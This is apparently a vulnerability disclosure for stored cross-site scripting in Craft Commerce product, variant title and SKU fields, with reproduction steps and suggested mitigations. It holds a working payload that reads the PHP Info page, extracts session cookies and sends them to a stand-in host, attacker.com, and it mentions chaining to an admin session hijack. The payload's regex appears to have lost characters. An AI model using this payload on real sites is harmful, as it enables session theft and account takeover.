Summary

Proof of Concept

Permissions Required

• Access the control panel
• Access Craft Commerce
• Create/Edit products

Steps to Reproduce

1. Log in to the control panel
2. Navigate to Commerce → Products
3. Add a new product and set the Title field to: (replace https://attacker.com)

<img src=x onerror="fetch('/admin/utilities/php-info').then(r=>r.text()).then(t=>{m=t.match(/<th[^>]*>Cookie[^<]*</th>s*<td[^>]*>([sS]*?)</td>/);if(m)new Image().src='https://attacker.com/s?c='+btoa(m[1])})">

4. Save the product
5. Navigate to Commerce → Inventory (/admin/commerce/inventory)
6. XSS executes, fetches PHP Info page, extracts session cookies, and exfiltrates them to the attacker server

Cookie Extraction Details

• HTTP COOKIE
• Cookie (used in this PoC)
• $ SERVER['HTTP COOKIE']
• $ COOKIE['<cookie-name>']

Notes

• The same vulnerability exists in Variant Title and Variant SKU fields while creating a product. The PoC focuses on Product Title, but the same attack works for the other two fields.
• $ COOKIE['CRAFT CSRF TOKEN'] is masked in PHP Info, but the unmasked value is available in the other parameters listed above.
• This vulnerability can also be chained to achieve full database exfiltration or do it after hijacking an administrator session.

Mitigation

1. Sanitize product and variant fields when rendering in the inventory template
2. Mask sensitive cookie values in the PHP Info utility page (similar to how CRAFT CSRF TOKEN, CRAFT SECURITY KEY, and CRAFT DB PASSWORD are already masked)